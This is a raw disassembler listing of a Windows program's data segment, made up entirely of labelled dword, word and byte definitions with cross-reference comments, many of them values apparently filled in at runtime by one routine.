dword_44411C dd 77E09070h ; DATA XREF: sub_4012D6+2D9�w
; sub_41B065+4F�r
dword_444120 dd 71AB3F8Dh ; DATA XREF: sub_4012D6+66B�w
; sub_4012D6+79C�r ...
dword_444124 dd 77E6CBF9h ; DATA XREF: sub_4012D6+99�w
; sub_4012D6+EA�r ...
dword_444128 dd 1F7CD214h ; DATA XREF: sub_4012D6+C0E�w
; sub_4012D6+C3F�r
dword_44412C dd 76206853h ; DATA XREF: sub_4012D6+818�w
; sub_4012D6+888�r
dword_444130 dd 77C72C6Bh ; DATA XREF: sub_4012D6+4A7�w
; sub_4012D6+4EB�r ...
dword_444134 dd 77DDAB2Fh ; DATA XREF: sub_4012D6+3A6�w
; sub_4012D6+3E7�r ...
dword_444138 dd 73B81E3Bh ; DATA XREF: sub_4012D6+C85�w
; sub_4012D6+C8C�r ...
dword_44413C dd 76206B7Fh ; DATA XREF: sub_4012D6+832�w
; sub_4012D6+898�r
dword_444140 dd 71C214BAh ; DATA XREF: sub_4012D6+9B1�w
; sub_4012D6+A2B�r ...
dword_444144 dd 77DD5C55h ; DATA XREF: sub_401000+55�r
; sub_4012D6+2B2�w ...
dword_444148 dd 71ABF628h ; DATA XREF: sub_4012D6+6AC�w
dword_44414C dd 77E802FCh ; DATA XREF: sub_4012D6+A6�w
; sub_4012D6+F2�r
dword_444150 dd 77DD590Bh ; DATA XREF: sub_401000+2A�r
; sub_4012D6+28B�w ...
dword_444154 dd 77EBA595h ; DATA XREF: sub_4012D6+4B�w
; sub_4012D6+C2�r ...
dword_444158 dd 76D629BBh ; DATA XREF: sub_4012D6+91A�w
; sub_4012D6+92E�r
dword_44415C dd 71AB1B7Bh ; DATA XREF: sub_4012D6+55A�w
dword_444160 dd 77D4BDCAh ; DATA XREF: sub_4012D6+165�w
; sub_4012D6:loc_401490�r ...
dword_444164 dd 76204E4Dh ; DATA XREF: sub_4012D6+879�w
dword_444168 dd 71AB2BBFh ; DATA XREF: sub_4012D6+692�w
; sub_4012D6+7B4�r ...
dword_44416C dd 76F36EEBh ; DATA XREF: sub_4012D6+AA2�w
dword_444170 dd 77DDA595h ; DATA XREF: sub_4012D6+33A�w
; sub_41C3D9+55�r
dword_444174 dd 76D67A29h ; DATA XREF: sub_4012D6+AEC�w
; sub_4022F5+8E�r
dword_444178 dd 77C7531Dh ; DATA XREF: sub_4012D6+473�w
; sub_4012D6+4CB�r ...
dword_44417C dd 71AB12F8h ; DATA XREF: sub_4012D6+5C2�w
; sub_4012D6+730�r ...
dword_444180 dd 77C7212Fh ; DATA XREF: sub_4012D6+466�w
; sub_4012D6+4C3�r ...
dword_444184 dd 77C72889h ; DATA XREF: sub_4012D6+4B4�w
; sub_417F75+206�r
dword_444188 dd 71AB401Ch ; DATA XREF: sub_4012D6+5B5�w
; sub_4012D6+724�r ...
dword_44418C dd 76D62A37h ; DATA XREF: sub_4012D6+927�w
; sub_4012D6+93B�r
dword_444190 dd 77C729E2h ; DATA XREF: sub_4012D6+49A�w
; sub_4012D6+4E3�r ...
dword_444194 dd 71AB60C9h ; DATA XREF: sub_4012D6+54D�w
; sub_4012D6+6D0�r
dword_444198 dd 77DDACABh ; DATA XREF: sub_4012D6+40F�w
; sub_41D779+ED�r
dword_44419C dd 73B81B0Fh ; DATA XREF: sub_4012D6+C92�w
; sub_40274D+6FC7�r
dword_4441A0 dd 71AB1AF4h ; DATA XREF: sub_4011F5+3E�r
; sub_40123B+80�r ...
dword_4441A4 dd 77D902E3h ; DATA XREF: sub_4012D6+1B3�w
; sub_41AEBB+15�r
dword_4441A8 dd 77E96645h ; DATA XREF: sub_4012D6+7F�w
; sub_4012D6+DA�r ...
dword_4441AC dd 71B2ACCBh ; DATA XREF: sub_4012D6+B29�w
; sub_4012D6+B4A�r ...
dword_4441B0 dd 71AB1890h ; DATA XREF: sub_4012D6+644�w
; sub_4012D6+784�r ...
dword_4441B4 dd 77E6D75Bh ; DATA XREF: sub_4012D6+B3�w
dword_4441B8 dd 7620BD61h ; DATA XREF: sub_4012D6+866�w
; sub_4012D6+8B4�r
dword_4441BC dd 1F7CB8F8h ; DATA XREF: sub_4012D6+C1B�w
; sub_4012D6+C47�r
dword_4441C0 dd 77C75455h ; DATA XREF: sub_4012D6+480�w
; sub_4012D6+4D3�r ...
dword_4441C4 dd 71AB1740h ; DATA XREF: sub_4012D6+574�w
; sub_4012D6+6E8�r ...
dword_4441C8 dd 77DDA20Bh ; DATA XREF: sub_4012D6+365�w
; sub_4012D6+3BA�r ...
dword_4441CC dd 77D4702Fh ; DATA XREF: sub_4012D6+158�w
; sub_4012D6+1AD�r ...
dword_4441D0 dd 77DE8075h ; DATA XREF: sub_4012D6+37F�w
; sub_4012D6+3CF�r ...
dword_4441D4 dd 71C45229h ; DATA XREF: sub_4012D6+9D8�w
; sub_4012D6+A43�r ...
dword_4441D8 dd 77DDA2AFh ; DATA XREF: sub_4012D6+3B3�w
; sub_4012D6+3EF�r ...
dword_4441DC dd 71AB12A7h ; DATA XREF: sub_4012D6+5F6�w
; seg000:0040BB92�r
dword_4441E0 dd 71AB14DCh ; DATA XREF: sub_4012D6+567�w
; sub_4012D6+6DC�r
dword_4441E4 dd 71AB3ECEh ; DATA XREF: sub_4012D6+637�w
; sub_4012D6+77C�r ...
dword_4441E8 dd 77DD189Ah ; DATA XREF: sub_401000+5E�r
; sub_4012D6+2BF�w ...
dword_4441EC dd 77DE1291h ; DATA XREF: sub_4012D6+38C�w
; sub_4012D6+3D7�r ...
dword_4441F0 dd 76F36EAAh ; DATA XREF: sub_4012D6+A95�w
; sub_4012D6+A9C�r ...
dword_4441F4 dd 76D62A58h ; DATA XREF: sub_4012D6+934�w
dword_4441F8 dd 1F7D886Ah ; DATA XREF: sub_4012D6+BE7�w
; sub_4012D6+C22�r
dword_4441FC dd 71ABD755h ; DATA XREF: sub_4012D6+69F�w
; sub_4012D6+7BC�r ...
dword_444200 dd 71AB1746h ; DATA XREF: sub_4012D6+5E9�w
; sub_4012D6+754�r
dword_444204 dd 77DD7496h ; DATA XREF: sub_4012D6+3C0�w
; sub_41C07C+AB�r
dword_444208 dd 0 ; DATA XREF: sub_4012D6+112�w
dword_44420C dd 71C2FA86h ; DATA XREF: sub_4012D6+997�w
; sub_4012D6+A1B�r ...
dword_444210 dd 1F7CD927h ; DATA XREF: sub_4012D6+C01�w
; sub_4012D6+C37�r
dword_444214 dd 77428B97h ; DATA XREF: sub_4012D6+B9D�w
; sub_4012D6+BA4�r ...
dword_444218 dd 71AB1A6Dh ; DATA XREF: seg000:00401121�r
; sub_4012D6+6B9�w ...
dword_44421C dd 77C76551h ; DATA XREF: sub_4012D6+459�w
; sub_4012D6+4BB�r ...
dword_444220 dd 71AB32CAh ; DATA XREF: sub_4012D6+685�w
; sub_4012D6+7AC�r ...
dword_444224 dd 71AB1836h ; DATA XREF: seg000:0040112C�r
; seg000:00401132�r ...
dword_444228 dd 77DF7311h ; DATA XREF: sub_4012D6+32D�w
; sub_4012D6+341�r ...
dword_44422C dd 77D4808Bh ; DATA XREF: sub_4012D6+213�w
; sub_4012D6+234�r
dword_444230 dd 71AB5DE2h ; DATA XREF: sub_4012D6+651�w
; sub_4012D6+78C�r ...
dword_444234 dd 71AB12A7h ; DATA XREF: sub_4012D6+5DC�w
; sub_4012D6+748�r ...
dword_444238 dd 77DD22EAh ; DATA XREF: sub_4012D6+27E�w
; sub_4012D6+2D3�r ...
dword_44423C dd 77D5E38Ch ; DATA XREF: sub_4012D6+199�w
; sub_4012D6+1DA�r ...
dword_444240 dd 71B22C25h ; DATA XREF: sub_4012D6+B36�w
; sub_4012D6+B57�r ...
dword_444244 dd 77DD5D20h ; DATA XREF: sub_4012D6+320�w
; sub_4012D6+334�r ...
dword_444248 dd 77E09134h ; DATA XREF: sub_4012D6+2CC�w
; sub_41B065+47�r
dword_44424C dd 77DE801Bh ; DATA XREF: sub_4012D6+372�w
; sub_4012D6+3C7�r ...
dword_444250 dd 77C76B34h ; DATA XREF: sub_4012D6+44C�w
; sub_4012D6+4AE�r ...
dword_444254 dd 0CC0004h ; DATA XREF: sub_4012D6+8DB�w
; sub_4012D6:loc_401BCF�w
dword_444258 dd 762059A3h ; DATA XREF: sub_4012D6+825�w
; sub_4012D6+890�r
dword_44425C dd 7622A3F4h ; DATA XREF: sub_4012D6+80B�w
; sub_4012D6+880�r ...
dword_444260 dd 71AB1746h ; DATA XREF: sub_4012D6+5CF�w
; sub_4012D6+73C�r ...
dword_444264 dd 0 ; DATA XREF: sub_4012D6:loc_4013D4�w
; sub_4012D6+12B�w ...
dword_444268 dd 0 ; DATA XREF: sub_4012D6+126�w
; sub_401F92+1C�r
dword_44426C dd 0 ; DATA XREF: sub_4012D6:loc_4014C4�w
; sub_4012D6:loc_40152B�w ...
dword_444270 dd 0 ; DATA XREF: sub_4012D6+250�w
; sub_401F92+50�r
dword_444274 dd 0 ; DATA XREF: sub_4012D6:loc_4015DE�w
; sub_4012D6:loc_401623�w ...
dword_444278 dd 0 ; DATA XREF: sub_4012D6+41E�w
; sub_401F92+84�r
dword_44427C dd 0 ; DATA XREF: sub_4012D6:loc_4017DA�w
; sub_401F92:loc_402042�r
dword_444280 dd 0 ; DATA XREF: sub_4012D6+4FF�w
; sub_401F92+B8�r
dword_444284 dd 0 ; DATA XREF: sub_4012D6:loc_401AAB�w
; sub_401F92:loc_402076�r
dword_444288 dd 0 ; DATA XREF: sub_4012D6+7D0�w
; sub_401F92+EC�r
dword_44428C dd 0 ; DATA XREF: sub_4012D6:loc_401B96�w
; sub_4012D6+8EF�w ...
dword_444290 dd 0 ; DATA XREF: sub_4012D6+8EA�w
; sub_401F92+120�r
dword_444294 dd 0 ; DATA XREF: sub_4012D6:loc_401C2A�w
; sub_401F92:loc_4020DE�r ...
dword_444298 dd 0 ; DATA XREF: sub_4012D6+94F�w
; sub_401F92+154�r
dword_44429C dd 0 ; DATA XREF: sub_4012D6:loc_401D46�w
; sub_401F92:loc_402112�r ...
dword_4442A0 dd 0 ; DATA XREF: sub_4012D6+A6B�w
; sub_401F92+188�r
dword_4442A4 dd 0 ; DATA XREF: sub_4012D6:loc_401D90�w
; sub_401F92:loc_402146�r
dword_4442A8 dd 0 ; DATA XREF: sub_4012D6+AB5�w
; sub_401F92+1BC�r
dword_4442AC dd 0 ; DATA XREF: sub_4012D6:loc_401DDA�w
; sub_401F92:loc_40217A�r
dword_4442B0 dd 0 ; DATA XREF: sub_4012D6+AFF�w
; sub_401F92+1F0�r
dword_4442B4 dd 0 ; DATA XREF: sub_4012D6:loc_401E4E�w
; sub_401F92:loc_4021AE�r
dword_4442B8 dd 0 ; DATA XREF: sub_4012D6+B73�w
; sub_401F92+224�r
dword_4442BC dd 0 ; DATA XREF: sub_4012D6:loc_401E98�w
; sub_401F92:loc_4021E2�r
dword_4442C0 dd 0 ; DATA XREF: sub_4012D6+BBD�w
; sub_401F92+258�r
dword_4442C4 dd 0 ; DATA XREF: sub_4012D6:loc_401F36�w
; sub_401F92:loc_402216�r
dword_4442C8 dd 0 ; DATA XREF: sub_4012D6+C5B�w
; sub_401F92+28C�r
dword_4442CC dd 0 ; DATA XREF: sub_4012D6:loc_401F80�w
; sub_401F92:loc_40224A�r
dword_4442D0 dd 0 ; DATA XREF: sub_4012D6+CA5�w
; sub_401F92+2C0�r
dword_4442D4 dd 5 dup(0) ; DATA XREF: sub_4023C9+46�o
dword_4442E8 dd 0 ; DATA XREF: sub_40274D+5B75�r
; sub_40274D+5C52�r ...
dd 7Fh dup(0)
dword_4444E8 dd 0 ; DATA XREF: sub_40AE85+45�w
; sub_40AF6E+3E�w ...
dword_4444EC dd 0 ; DATA XREF: sub_40AE85+3E�w
; sub_40AF6E+44�w ...
dword_4444F0 dd 0 ; DATA XREF: sub_40AE85+52�w
; sub_40AF6E+34�r ...
dword_4444F4 dd 0 ; DATA XREF: seg000:0040111B�r
; sub_4025EF+83�w ...
dword_4444F8 dd 0 ; DATA XREF: sub_40AF6E+6F�r
; sub_40B149+2A�w ...
dword_4444FC dd 0 ; DATA XREF: sub_40274D+719�w
; sub_40274D+94F�w ...
byte_444500 db 0 ; DATA XREF: sub_4025EF+5D�o
; sub_40274D+5ABC�r ...
align 4
dd 493h dup(0)
dword_445750 dd 473Ch dup(0) ; DATA XREF: seg001:004340F4�o
db 0
byte_457441 db 3 dup(0) ; DATA XREF: seg001:off_43764C�o
dd 0E306h dup(0)
dword_49005C dd 947Ah dup(0) ; DATA XREF: seg001:off_432E14�o
db 0
byte_4B5245 db 3 dup(0) ; DATA XREF: seg001:off_4374B8�o
dd 7028h dup(0)
dword_4D12E8 dd 0 ; DATA XREF: sub_40A263:loc_40A728�o
; sub_40AE85+13�o ...
dword_4D12EC dd 20h dup(0) ; DATA XREF: sub_40A263+47C�o
; sub_40A263+509�o ...
dword_4D136C dd 10h dup(0) ; DATA XREF: sub_40A263+497�o
dword_4D13AC dd 24h dup(0) ; DATA XREF: sub_40A263+4AE�o
dword_4D143C dd 0 ; DATA XREF: sub_40A263+49D�w
; sub_40A263+520�w ...
dword_4D1440 dd 0 ; DATA XREF: sub_40A263+4B9�w
align 10h
dword_4D1450 dd 0 ; DATA XREF: sub_40274D+A17�o
; sub_40274D+A88�r ...
dd 5 dup(0)
dword_4D1468 dd 0 ; DATA XREF: sub_40274D+A78�r
; sub_417C78+63�r
dd 1Fh dup(0)
dword_4D14E8 dd 0 ; DATA XREF: sub_40B075+16�o
; sub_40B094+19�o
dword_4D14EC dd 2B9h dup(0) ; DATA XREF: sub_40B028+3D�o
dword_4D1FD0 dd 1Bh ; DATA XREF: sub_40274D:loc_404F29�r
; sub_40A263+3D�w ...
dword_4D1FD4 dd 0 ; DATA XREF: sub_40A263+136�r
byte_4D1FD8 db 0 ; DATA XREF: sub_402472+29�r
; sub_402472+32�o
align 4
dword_4D1FDC dd 0 ; DATA XREF: sub_40274D+7B0B�w
; sub_40A263+4CA�w ...
dword_4D1FE0 dd 0 ; DATA XREF: sub_40274D+7E5�r
; sub_40A263+481�w
dword_4D1FE4 dd 0BCE3h ; DATA XREF: seg000:0040B7E1�r
; sub_40D055+30�r ...
byte_4D1FE8 db 0 ; DATA XREF: sub_40AD00+64�r
; sub_40AD00+92�w
align 10h
dword_4D1FF0 dd 0 ; DATA XREF: sub_40B619+18�r
; seg000:0040BC4C�w
dd 805h dup(0)
dword_4D4008 dd 0 ; DATA XREF: sub_40B494+E�r
; sub_40B494+31�r
dword_4D400C dd 0 ; DATA XREF: sub_40B494+9�r
; sub_40B494+25�r
dword_4D4010 dd 0 ; DATA XREF: seg000:0040BAB8�w
; seg000:0040BAF7�o
dword_4D4014 dd 4Fh dup(0) ; DATA XREF: seg000:0040BA86�o
db 2 dup(0)
word_4D4152 dw 0 ; DATA XREF: seg001:off_436E5C�o
dd 52h dup(0)
dword_4D429C dd 41h dup(0) ; DATA XREF: seg000:0040BA5B�o
dword_4D43A0 dd 0 ; DATA XREF: seg000:0040BA7D�w
; seg000:0040BAA5�r
align 8
dword_4D43A8 dd 0 ; DATA XREF: seg000:0040BAED�w
; seg000:0040BB09�r
dword_4D43AC dd 0 ; DATA XREF: seg000:0040BAAB�w
dword_4D43B0 dd 0 ; DATA XREF: seg000:0040BABD�w
dword_4D43B4 dd 0 ; DATA XREF: seg000:0040BA8B�w
dd 0
dword_4D43BC dd 0 ; DATA XREF: seg000:loc_40BB68�r
dword_4D43C0 dd 0 ; DATA XREF: seg000:0040B947�w
; seg000:0040B9DD�o
dword_4D43C4 dd 0 ; DATA XREF: seg000:0040B9D3�w
; seg000:0040B9EF�r
dword_4D43C8 dd 0 ; DATA XREF: seg000:0040B952�w
dword_4D43CC dd 0 ; DATA XREF: seg000:0040B93C�w
; seg000:0040B9AA�r
dword_4D43D0 dd 20h dup(0) ; DATA XREF: seg000:0040B965�o
; seg000:0040B997�o
dword_4D4450 dd 0 ; DATA XREF: seg000:0040B958�w
dword_4D4454 dd 0 ; DATA XREF: seg000:0040B96F�w
; seg000:0040B9A1�w
dword_4D4458 dd 0 ; DATA XREF: seg000:loc_40BB53�r
align 10h
dword_4D4460 dd 0 ; DATA XREF: seg000:0040B824�w
; seg000:0040B8B6�o
dword_4D4464 dd 41h dup(0) ; DATA XREF: seg000:0040B7ED�o
dword_4D4568 dd 41h dup(0) ; DATA XREF: seg000:0040B80B�o
dword_4D466C dd 0 ; DATA XREF: seg000:0040B8AC�w
; seg000:0040B8C8�r
dword_4D4670 dd 0 ; DATA XREF: seg000:0040B7F9�w
dword_4D4674 dd 0 ; DATA XREF: seg000:0040B7F4�w
; seg000:0040B883�r
dword_4D4678 dd 20h dup(0) ; DATA XREF: seg000:0040B83D�o
; seg000:0040B86F�o
dword_4D46F8 dd 0 ; DATA XREF: seg000:0040B830�w
dword_4D46FC dd 0 ; DATA XREF: seg000:0040B847�w
; seg000:0040B879�w
dword_4D4700 dd 0 ; DATA XREF: seg000:loc_40B983�r
align 8
dword_4D4708 dd 0 ; DATA XREF: seg000:0040B712�w
; seg000:0040B78E�o
dword_4D470C dd 41h dup(0) ; DATA XREF: seg000:0040B6D6�o
dword_4D4810 dd 41h dup(0) ; DATA XREF: seg000:0040B6F9�o
dword_4D4914 dd 0 ; DATA XREF: seg000:0040B784�w
; seg000:0040B7A0�r
dword_4D4918 dd 0 ; DATA XREF: seg000:0040B6E2�w
dword_4D491C dd 0 ; DATA XREF: seg000:0040B6DD�w
; seg000:0040B75B�r
dword_4D4920 dd 20h dup(0) ; DATA XREF: seg000:0040B72A�o
; seg000:0040B747�o
dword_4D49A0 dd 0 ; DATA XREF: seg000:0040B71D�w
dword_4D49A4 dd 0 ; DATA XREF: seg000:0040B734�w
; seg000:0040B751�w
dword_4D49A8 dd 0 ; DATA XREF: seg000:loc_40B85B�r
dd 81h dup(0)
dword_4D4BB0 dd 40h dup(0) ; DATA XREF: sub_40D055+C0�o
; seg000:0040D2AF�o
dword_4D4CB0 dd 0 ; DATA XREF: seg000:0040D2C7�w
dword_4D4CB4 dd 0 ; DATA XREF: seg000:0040D688�w
; seg000:0040D6A1�r ...
dword_4D4CB8 dd 0 ; DATA XREF: seg000:0040D29E�w
; seg000:0040D695�w ...
dword_4D4CBC dd 0 ; DATA XREF: seg000:0040D18F�w
; seg000:0040D290�r ...
dword_4D4CC0 dd 0 ; DATA XREF: seg000:0040D174�w
; seg000:loc_40D1B6�r
align 8
dword_4D4CC8 dd 2Bh dup(0) ; DATA XREF: seg000:0040D236�o
dword_4D4D74 dd 81h dup(0) ; DATA XREF: seg000:0040D258�o
db 2 dup(0)
word_4D4F7A dw 0 ; DATA XREF: seg000:0040D56D�o
; seg000:0040D59A�o ...
dword_4D4F7C dd 0 ; DATA XREF: seg000:loc_40D630�o
db 2 dup(0)
word_4D4F82 dw 0 ; DATA XREF: seg000:0040D2F2�o
; seg000:0040D324�o ...
dword_4D4F84 dd 4 dup(0) ; DATA XREF: seg000:loc_40D303�o
dword_4D4F94 dd 2Eh dup(0) ; DATA XREF: seg000:0040D269�o
db 2 dup(0)
word_4D504E dw 0 ; DATA XREF: seg000:0040D27D�o
dd 1Eh dup(0)
dword_4D50C8 dd 0 ; DATA XREF: seg000:0040D721�w
; seg000:0040D74B�r
dword_4D50CC dd 3 dup(0) ; DATA XREF: sub_40ED91+66�o
dword_4D50D8 dd 40h dup(0) ; DATA XREF: sub_40F87A+1E�o
dword_4D51D8 dd 0 ; DATA XREF: sub_40F87A+71�r
; sub_40F87A+85�r
align 10h
dword_4D51E0 dd 19h dup(0) ; DATA XREF: sub_40F87A+93�o
dword_4D5244 dd 0 ; DATA XREF: seg000:004115EF�o
; seg000:00411624�r ...
dword_4D5248 dd 0 ; DATA XREF: seg000:004114FC�r
; seg000:004115EA�o ...
dword_4D524C dd 0 ; DATA XREF: seg000:00411529�r
; seg000:00411611�o ...
dword_4D5250 dd 0 ; DATA XREF: seg000:004114DE�r
; seg000:00411547�r ...
dword_4D5254 dd 0 ; DATA XREF: seg000:0041160C�o
; seg000:00411630�r ...
dword_4D5258 dd 0 ; DATA XREF: sub_40B4FF+15�r
dword_4D525C dd 0BC8Eh ; DATA XREF: seg000:0040B937�r
; seg000:0040CF7A�r ...
dword_4D5260 dd 0 ; DATA XREF: seg000:00411A2A�w
; seg000:00411A51�r ...
dd 5 dup(0)
byte_4D5278 db 0 ; DATA XREF: seg000:00415D98�w
; seg000:00415E97�o
align 2
word_4D527A dw 0 ; DATA XREF: seg000:00415DA8�w
word_4D527C dw 0 ; DATA XREF: seg000:00415DAE�w
word_4D527E dw 0 ; DATA XREF: seg000:00415DB5�w
byte_4D5280 db 0 ; DATA XREF: seg000:00415DBC�w
byte_4D5281 db 0 ; DATA XREF: seg000:00415DC3�w
word_4D5282 dw 0 ; DATA XREF: seg000:00415DC9�w
dword_4D5284 dd 0 ; DATA XREF: seg000:00415DF7�w
; seg000:00415E15�w
dword_4D5288 dd 0 ; DATA XREF: seg000:00415E1D�w
byte_4D528C db 0 ; DATA XREF: seg000:00415E2F�w
byte_4D528D db 0 ; DATA XREF: seg000:00415E42�w
word_4D528E dw 0 ; DATA XREF: seg000:00415E5A�w
word_4D5290 dw 0 ; DATA XREF: seg000:00415E69�w
word_4D5292 dw 0 ; DATA XREF: seg000:00415E61�w
dword_4D5294 dd 101h dup(0) ; DATA XREF: seg000:00415E7E�o
dword_4D5698 dd 80h dup(0) ; DATA XREF: sub_40274D+2D39�o
; sub_40274D:loc_405535�o ...
dword_4D5898 dd 0 ; DATA XREF: sub_40274D+1843�w
; sub_40274D+2D31�r ...
align 10h
byte_4D58A0 db 0 ; DATA XREF: sub_417272+1C8�w
; sub_417272+2A1�o
align 2
word_4D58A2 dw 0 ; DATA XREF: sub_417272+1D5�w
word_4D58A4 dw 0 ; DATA XREF: sub_417272+1DF�w
word_4D58A6 dw 0 ; DATA XREF: sub_417272+1E8�w
byte_4D58A8 db 0 ; DATA XREF: sub_417272+1EF�w
byte_4D58A9 db 0 ; DATA XREF: sub_417272+1F6�w
word_4D58AA dw 0 ; DATA XREF: sub_417272+1FD�w
dword_4D58AC dd 0 ; DATA XREF: sub_417272+20A�w
dword_4D58B0 dd 0 ; DATA XREF: sub_417272+212�w
word_4D58B4 dw 0 ; DATA XREF: sub_417272+26B�w
word_4D58B6 dw 0 ; DATA XREF: sub_417272+253�w
word_4D58B8 dw 0 ; DATA XREF: sub_417272+27D�w
word_4D58BA dw 0 ; DATA XREF: sub_417272+21E�w
dword_4D58BC dd 100h dup(0) ; DATA XREF: sub_417272+28C�o
dword_4D5CBC dd 0 ; DATA XREF: sub_41776E+372�w
; sub_41776E+3E8�o
dword_4D5CC0 dd 0 ; DATA XREF: sub_41776E+30E�w
byte_4D5CC4 db 0 ; DATA XREF: sub_41776E+314�w
byte_4D5CC5 db 0 ; DATA XREF: sub_41776E+31A�w
word_4D5CC6 dw 0 ; DATA XREF: sub_41776E+327�w
dword_4D5CC8 dd 6 dup(0) ; DATA XREF: sub_41776E+3CC�o
byte_4D5CE0 db 0 ; DATA XREF: sub_41776E+223�o
; sub_41776E+238�w ...
byte_4D5CE1 db 0 ; DATA XREF: sub_41776E+246�w
word_4D5CE2 dw 0 ; DATA XREF: sub_41776E+270�w
word_4D5CE4 dw 0 ; DATA XREF: sub_41776E+25E�w
; sub_41776E:loc_417B11�w
word_4D5CE6 dw 0 ; DATA XREF: sub_41776E+276�w
byte_4D5CE8 db 0 ; DATA XREF: sub_41776E+27D�w
byte_4D5CE9 db 0 ; DATA XREF: sub_41776E+23F�w
word_4D5CEA dw 0 ; DATA XREF: sub_41776E+3B9�w
; sub_41776E+3ED�w
dword_4D5CEC dd 0 ; DATA XREF: sub_41776E:loc_417A0A�w
; sub_41776E+36D�r
dword_4D5CF0 dd 0 ; DATA XREF: sub_41776E+2A9�w
word_4D5CF4 dw 0 ; DATA XREF: sub_41776E+367�w
; sub_41776E+3C7�o
word_4D5CF6 dw 0 ; DATA XREF: sub_41776E+308�w
; sub_41776E+32D�r ...
dword_4D5CF8 dd 0 ; DATA XREF: sub_41776E+2E2�w
; sub_41776E+3AA�w
dword_4D5CFC dd 0 ; DATA XREF: sub_41776E+2FB�w
; sub_41776E+37E�w ...
byte_4D5D00 db 0 ; DATA XREF: sub_41776E+2E7�r
; sub_41776E+2F0�w
byte_4D5D01 db 0 ; DATA XREF: sub_41776E+2AE�w
; sub_41776E+377�w ...
word_4D5D02 dw 0 ; DATA XREF: sub_41776E+2BC�w
word_4D5D04 dw 0 ; DATA XREF: sub_41776E+3C0�w
; sub_41776E+40C�w
word_4D5D06 dw 0 ; DATA XREF: sub_41776E+301�w
dd 0
word_4D5D0C dw 0 ; DATA XREF: sub_41776E+333�w
; sub_41776E+3FD�o
word_4D5D0E dw 0 ; DATA XREF: sub_41776E+342�w
; sub_41776E+3DB�w
dword_4D5D10 dd 0 ; DATA XREF: sub_41776E+33C�w
align 10h
dword_4D5D20 dd 0 ; DATA XREF: sub_41776E+32�w
; sub_41776E+406�r
align 8
dword_4D5D28 dd 100h dup(0) ; DATA XREF: sub_41776E+1AC�o
; sub_41776E+44F�o
dword_4D6128 dd 1000h dup(0) ; DATA XREF: sub_417D70+1D�o
; sub_417E10�o
dword_4DA128 dd 0 ; DATA XREF: sub_417D70+13�o
; sub_417E10+E�o ...
dword_4DA12C dd 0Dh dup(0) ; DATA XREF: sub_419443+10�o
dword_4DA160 dd 201h dup(0) ; DATA XREF: seg000:00419C61�o
; seg000:00419DC1�o ...
dword_4DA964 dd 0 ; DATA XREF: seg000:00419EA4�r
; seg000:00419F4A�r
dword_4DA968 dd 203h dup(0) ; DATA XREF: seg000:00419C78�o
; seg000:00419DD8�o ...
dword_4DB174 dd 0 ; DATA XREF: seg000:00419E54�r
; seg000:00419E7D�r ...
dword_4DB178 dd 0 ; DATA XREF: seg000:00419CFE�w
; seg000:00419E29�w
dword_4DB17C dd 0 ; DATA XREF: seg000:00419D03�w
; seg000:00419E2F�w ...
dword_4DB180 dd 0 ; DATA XREF: seg000:00419CDC�w
; seg000:00419E9E�r
align 8
dword_4DB188 dd 80h dup(0) ; DATA XREF: seg000:00419EAD�o
dword_4DB388 dd 80h dup(0) ; DATA XREF: seg000:00419F25�o
dword_4DB588 dd 0 ; DATA XREF: seg000:0041A7CC�w
; seg000:loc_41A934�w ...
dword_4DB58C dd 0 ; DATA XREF: sub_40274D+39DD�o
; sub_41A24C+13�o ...
dd 0
dword_4DB594 dd 0 ; DATA XREF: seg000:0041A7C4�r
; sub_41A954+3A�r
dd 7Fh dup(0)
dword_4DB794 dd 0 ; DATA XREF: seg000:0041A7BC�r
; sub_41A954+4B�w
dd 1944h dup(0)
dword_4E1CA8 dd 0 ; DATA XREF: sub_41A954+23�o
; sub_41ACD0+6D�o
dword_4E1CAC dd 7Fh dup(0) ; DATA XREF: sub_40274D+39FB�o
; sub_41A24C+3C�o
dword_4E1EA8 dd 17h dup(0) ; DATA XREF: sub_41B507:loc_41B620�o
; sub_41B507+12D�o ...
dword_4E1F04 dd 0 ; DATA XREF: sub_41B802+53�w
; sub_41B802+5B�r ...
dword_4E1F08 dd 0 ; DATA XREF: sub_41B802+33�r
; sub_41B802+3E�w
align 10h
dword_4E1F10 dd 18h dup(0) ; DATA XREF: sub_41BD5A:loc_41BE78�o
; sub_41BD5A+12A�o
dword_4E1F70 dd 80h dup(0) ; DATA XREF: sub_41BE8A+81�o
; sub_41BE8A+A9�o
dword_4E2170 dd 80h dup(0) ; DATA XREF: sub_41BF46:loc_41BF7E�o
; sub_41BF46+60�o
dword_4E2370 dd 80h dup(0) ; DATA XREF: sub_41BFBE+51�o
; sub_41BFBE+83�o ...
dword_4E2570 dd 80h dup(0) ; DATA XREF: sub_41C19B+68�o
; sub_41C19B+8E�o ...
dword_4E2770 dd 0 ; DATA XREF: sub_41C7BD+1A�r
; sub_41C9D4+87�o
dword_4E2774 dd 0 ; DATA XREF: seg000:0041C936�r
; seg000:0041C97D�r ...
dword_4E2778 dd 0 ; DATA XREF: sub_41C78D:loc_41C7A1�r
; sub_41C9D4+11F�w
dword_4E277C dd 0 ; DATA XREF: sub_41C78D�r
; seg000:0041C916�r ...
dword_4E2780 dd 0Dh dup(0) ; DATA XREF: seg000:0041C931�o
; seg000:0041C978�o ...
dword_4E27B4 dd 0 ; DATA XREF: sub_41C78D:loc_41C7AE�r
; seg000:0041C8B1�r ...
dword_4E27B8 dd 0Eh dup(0) ; DATA XREF: sub_41D5F8+40�o
byte_4E27F0 db 0 ; DATA XREF: seg000:0041DF9C�o
; seg000:0041DFC2�o ...
align 4
dd 3Fh dup(0)
dword_4E28F0 dd 0 ; DATA XREF: sub_41E7B2+43�r
; sub_41E7B2+9F�w
dword_4E28F4 dd 0 ; DATA XREF: sub_41E524+9�w
; sub_41EAB4+165�w ...
dword_4E28F8 dd 0 ; DATA XREF: sub_42065F+35�w
; sub_420EE9:loc_420F83�w ...
dword_4E28FC dd 0 ; DATA XREF: sub_426A43+149�r
dword_4E2900 dd 2 ; DATA XREF: start-C32CA�w sub_4210D5�r ...
dword_4E2904 dd 0A28h ; DATA XREF: start-C32AA�w start-C3299�w
dword_4E2908 dd 501h ; DATA XREF: start-C328E�w
dword_4E290C dd 5 ; DATA XREF: start-C32C1�w
; sub_4210D5+9�r ...
dword_4E2910 dd 1 ; DATA XREF: start-C32B9�w
dword_4E2914 dd 1 ; DATA XREF: sub_40A263:loc_40A542�r
; sub_42661A+8F�w
dword_4E2918 dd 970B20h ; DATA XREF: sub_40A263+2E8�r
; sub_40A263+308�r ...
align 10h
dword_4E2920 dd 970B40h ; DATA XREF: sub_4263E7+48�w
; sub_4263E7:loc_426498�r ...
align 10h
